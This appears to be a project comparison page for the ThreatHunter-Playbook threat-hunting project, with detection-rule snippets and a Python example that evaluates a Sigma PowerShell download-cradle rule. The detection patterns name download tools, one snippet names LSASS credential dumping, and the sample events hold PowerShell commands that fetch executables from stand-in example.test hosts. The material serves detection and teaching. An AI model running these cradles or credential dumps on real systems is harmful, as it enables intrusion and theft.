
OTRF/ThreatHunter-Playbook

A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.


Top Related Projects

  • cti: Cyber Threat Intelligence Repository expressed in STIX 2.0
  • Atomic Red Team: Small and highly portable detection tests based on MITRE's ATT&CK.
  • OSSEM: Open Source Security Events Metadata
  • Sigma: Main Sigma Rule Repository
Quick Overview

The OTRF/ThreatHunter-Playbook is a comprehensive resource for cybersecurity professionals, focusing on threat hunting techniques and methodologies. It provides a collection of hunting queries, data analysis procedures, and detection strategies to help security teams proactively identify and mitigate potential threats in their environments.

Pros

  • Extensive collection of threat hunting techniques and queries
  • Well-organized and categorized content for easy navigation
  • Regular updates and contributions from the cybersecurity community
  • Includes both general and platform-specific hunting strategies

Cons

  • May require advanced knowledge of security concepts and tools
  • Some queries might need adaptation for specific environments
  • Limited coverage of certain niche or emerging threat vectors
  • Requires ongoing maintenance to keep up with evolving threats

Getting Started

To get started with the ThreatHunter-Playbook:

  1. Visit the GitHub repository: https://github.com/OTRF/ThreatHunter-Playbook
  2. Browse the docs folder for detailed documentation and guides
  3. Explore the notebooks directory for Jupyter notebooks with practical examples
  4. Review the resources section for additional tools and references
  5. Join the community discussions in the Issues and Pull Requests sections to contribute or ask questions

Note: This project is not a code library, so there is no package to install. Its analytics are delivered as Jupyter notebooks that bundle the hypothesis, the query and the expected output, and that can be run against pre-recorded security datasets locally or through Binder, so "getting started" means opening a notebook rather than importing an API.

Competitor Comparisons

cti: Cyber Threat Intelligence Repository expressed in STIX 2.0

Pros of cti

  • Comprehensive MITRE ATT&CK framework data in STIX format
  • Regular updates with the latest threat intelligence
  • Widely adopted and integrated into many security tools

Cons of cti

  • Focuses primarily on data, lacking specific detection and response guidance
  • May require additional processing to extract actionable insights
  • Less emphasis on practical implementation for threat hunting

Code Comparison

ThreatHunter-Playbook detection logic (written here in Sigma rule syntax, YAML):

name: Suspicious PowerShell Download Cradle
description: Detects suspicious PowerShell download cradles
detection:
  selection:
    EventID: 4104
    ScriptBlockText|contains:
      - 'Net.WebClient'
      - 'DownloadString'
  condition: selection
cti (STIX JSON):

{
  "type": "attack-pattern",
  "id": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
  "name": "PowerShell",
  "description": "Adversaries may use PowerShell to execute various commands...",
  "kill_chain_phases": [
    {
      "kill_chain_name": "mitre-attack",
      "phase_name": "execution"
    }
  ]
}

ThreatHunter-Playbook provides specific, runnable detection logic, while cti provides the structured ATT&CK knowledge base (techniques, groups, software and their relationships) that such detections are mapped to when building a detection strategy.

Atomic Red Team: Small and highly portable detection tests based on MITRE's ATT&CK.

Pros of Atomic Red Team

  • Extensive library of pre-built tests for various attack techniques
  • Easy-to-use format with tests organized by MITRE ATT&CK tactics
  • Active community and frequent updates

Cons of Atomic Red Team

  • Focuses primarily on attack simulation, less on detection and response
  • May require additional tools or setup for some tests

Code Comparison

ThreatHunter-Playbook (Jupyter Notebook example):

# openhunt is the helper package the playbook notebooks use to get a Spark session
from openhunt.mordorutils import *
spark = get_spark()

# Local copy of a pre-recorded security dataset in Parquet format (placeholder path)
path = "/path/to/dataset.parquet"

df = spark.read.parquet(path)
df.printSchema()          # inspect the event fields before writing a query
df.show(10, False)        # first 10 rows, untruncated

Atomic Red Team (YAML test definition):

attack_technique: T1003.001
display_name: 'OS Credential Dumping: LSASS Memory'
atomic_tests:
  - name: Dump LSASS.exe Memory using ProcDump
    auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8

ThreatHunter-Playbook provides more comprehensive analytics and detection strategies, while Atomic Red Team excels in providing a wide range of attack simulations. ThreatHunter-Playbook uses Jupyter Notebooks for analysis, whereas Atomic Red Team uses YAML for test definitions. Both repositories complement each other, with ThreatHunter-Playbook focusing on threat hunting and Atomic Red Team on attack simulation.

OSSEM: Open Source Security Events Metadata

Pros of OSSEM

  • Provides a comprehensive data model for security events
  • Focuses on standardizing data structures and relationships
  • Offers broader applicability across various security tools and platforms

Cons of OSSEM

  • More complex and requires deeper understanding of data modeling
  • Less immediate practical application for threat hunting
  • May require more effort to implement in existing security workflows

Code Comparison

OSSEM (Data Dictionary):

- Standard_Name: UserName
  Standard_Type: String
  Description: The name of the user account
  Sample_Value: john.doe

ThreatHunter-Playbook analytic (written here in Sigma rule syntax):

title: Suspicious PowerShell Download
description: Detects PowerShell downloading files from the internet
author: John Doe
detection:
  selection:
    EventID: 4104
    ScriptBlockText: '*Invoke-WebRequest*'
  condition: selection

The OSSEM example is a data dictionary entry: it standardizes what a field is called and what it holds, so that a rule written against UserName means the same thing across log sources. The ThreatHunter-Playbook example is a detection rule that consumes such fields and can be converted and run directly in a hunt.

Sigma: Main Sigma Rule Repository

Pros of Sigma

  • Generic, vendor-agnostic rule format for easier sharing and portability
  • Extensive collection of pre-written detection rules
  • Supports conversion to various SIEM and data analysis tools

Cons of Sigma

  • Primarily focused on detection rules, less comprehensive for full threat hunting workflows
  • May require additional tools or scripts for implementation in some environments

Code Comparison

Sigma rule example:

title: Suspicious PowerShell Download
logsource:
  product: windows
  category: ps_script
detection:
  selection:
    EventID: 4104
    ScriptBlockText|contains:
      - 'Net.WebClient'
      - '.DownloadFile'
  condition: selection

ThreatHunter-Playbook notebook example:

# Query for PowerShell download events; assumes a Spark session `spark` and
# a registered table `powershell_events` holding EventID 4104 records
results = spark.sql("""
SELECT ScriptBlockText
FROM powershell_events
WHERE ScriptBlockText LIKE '%Net.WebClient%'
  AND ScriptBlockText LIKE '%.DownloadFile%'
""")
results.show(truncate=False)

Both repositories provide valuable resources for threat detection and hunting. Sigma offers a standardized approach to writing and sharing detection rules, while ThreatHunter-Playbook provides more comprehensive playbooks and workflows for threat hunting scenarios. The choice between them depends on specific use cases and integration requirements.
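The two comparisons above (Sigma rule versus notebook SQL here, and Sigma-style rule versus STIX data in the cti comparison) both rest on the same detection logic: EventID 4104 script blocks containing a download cradle. The block below is an added worked example, not code from the Threat Hunter Playbook or the Sigma project. It evaluates that selection in plain Python over constructed 4104 records and renders it as the WHERE clause a notebook query would use. It also shows the caveat a hunter hits when translating between the two: Sigma's contains modifier is case-insensitive, while Spark SQL's LIKE is case-sensitive, so a literal translation misses a cradle whose case has been varied (PowerShell does not care about case, so the attacker does not either). The event records and example.test URLs are constructed for the example.

```python
"""Evaluate a Sigma-style PowerShell download-cradle selection over sample
EventID 4104 records, and emit the equivalent SQL WHERE clause.

Added example for this page, not code from the Threat Hunter Playbook or
the Sigma project. The rule content follows the Sigma rule shown above;
the event records below are constructed samples, not real telemetry.
"""

# The selection from the Sigma rule above, as a Python dict rather than YAML.
RULE = {
    "title": "Suspicious PowerShell Download",
    "detection": {
        "selection": {
            "EventID": 4104,
            "ScriptBlockText|contains": ["Net.WebClient", ".DownloadFile"],
        },
        "condition": "selection",
    },
}

# Constructed records shaped like Microsoft-Windows-PowerShell/Operational
# 4104 (script block logging) events. The second one is the same cradle with
# its case varied, which is legal PowerShell (cmdlet and member names are
# case-insensitive) and a cheap evasion against case-sensitive matching.
EVENTS = [
    {"EventID": 4104,
     "ScriptBlockText": "(New-Object Net.WebClient).DownloadFile('http://example.test/a.exe','a.exe')"},
    {"EventID": 4104,
     "ScriptBlockText": "(new-object NET.webclient).downloadfile('http://example.test/b.exe','b.exe')"},
    {"EventID": 4104,
     "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"EventID": 4100,
     "ScriptBlockText": "Net.WebClient .DownloadFile"},  # right text, wrong event id
]


def _field_matches(value, modifier, expected, case_insensitive):
    """Compare one event field against a Sigma selection entry.

    A list of expected values is OR-ed. Sigma string matching is
    case-insensitive by default; case_insensitive=False emulates a backend
    whose LIKE is case-sensitive (Spark SQL is one such backend).
    """
    if value is None:
        return False
    expected = expected if isinstance(expected, list) else [expected]
    fold = (lambda s: str(s).lower()) if case_insensitive else str
    haystack = fold(value)
    if modifier == "":
        return any(haystack == fold(e) for e in expected)
    if modifier == "contains":
        return any(fold(e) in haystack for e in expected)
    raise ValueError(f"unsupported Sigma modifier: {modifier!r}")


def selection_matches(selection, event, case_insensitive=True):
    """All entries of one Sigma selection map are AND-ed."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        if not _field_matches(event.get(field), modifier, expected, case_insensitive):
            return False
    return True


def hunt(rule, events, case_insensitive=True):
    """Return events matched by a rule whose condition is the bare 'selection'."""
    detection = rule["detection"]
    if detection.get("condition") != "selection":
        raise ValueError("only 'condition: selection' is handled in this example")
    return [e for e in events
            if selection_matches(detection["selection"], e, case_insensitive)]


def _sql_literal(value):
    """Quote a value for SQL: numbers inline, strings single-quoted and escaped."""
    if isinstance(value, (int, float)):
        return str(value)
    return "'" + str(value).replace("'", "''") + "'"


def to_sql_where(selection):
    """Render the selection as a WHERE clause for the notebook-style SQL above.

    Spark SQL's LIKE is case-sensitive, so both sides are lower()-ed to keep
    Sigma's case-insensitive semantics when the rule is converted.
    """
    clauses = []
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        values = expected if isinstance(expected, list) else [expected]
        if modifier == "":
            alts = " OR ".join(f"{field} = {_sql_literal(v)}" for v in values)
        elif modifier == "contains":
            alts = " OR ".join(
                f"lower({field}) LIKE {_sql_literal('%' + str(v).lower() + '%')}"
                for v in values)
        else:
            raise ValueError(f"unsupported Sigma modifier: {modifier!r}")
        clauses.append(f"({alts})")
    return " AND ".join(clauses)


if __name__ == "__main__":
    sel = RULE["detection"]["selection"]
    print("Sigma semantics :", len(hunt(RULE, EVENTS)), "hits")         # 2
    print("case-sensitive  :", len(hunt(RULE, EVENTS, False)), "hits")  # 1
    print("WHERE", to_sql_where(sel))
```

Run as a script it reports two hits under Sigma semantics and one under case-sensitive matching; the missed record is the lower-cased cradle. When porting a Sigma rule into a notebook query by hand, wrap the column and the pattern in lower() as the generated clause does, or the notebook will be strictly weaker than the rule it was copied from.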


README

The Threat Hunter Playbook

License: MIT

The Threat Hunter Playbook is a community-driven, open source project to share detection logic, adversary tradecraft and resources to make detection development more efficient. All the detection documents in this project follow the structure of MITRE ATT&CK, categorizing post-compromise adversary behavior into tactical groups, and are available in the form of interactive notebooks. The use of notebooks not only allows us to share text, queries and expected output, but also code that helps others run the detection logic against pre-recorded security datasets, either locally or remotely through BinderHub cloud computing environments.

Docs: https://threathunterplaybook.com/

Goals

  • Expedite the development of techniques and hypotheses for hunting campaigns.
  • Help security researchers understand patterns of behavior observed during post-exploitation.
  • Share resources to validate analytics locally or remotely through cloud computing environments for free.
  • Map pre-recorded datasets to adversarial techniques.
  • Accelerate infosec learning through open source resources.

Author

Roberto Rodriguez @Cyb3rWard0g

Official Committers

  • Jose Luis Rodriguez @Cyb3rPandaH is adding his expertise in data science to it.

Acknowledgements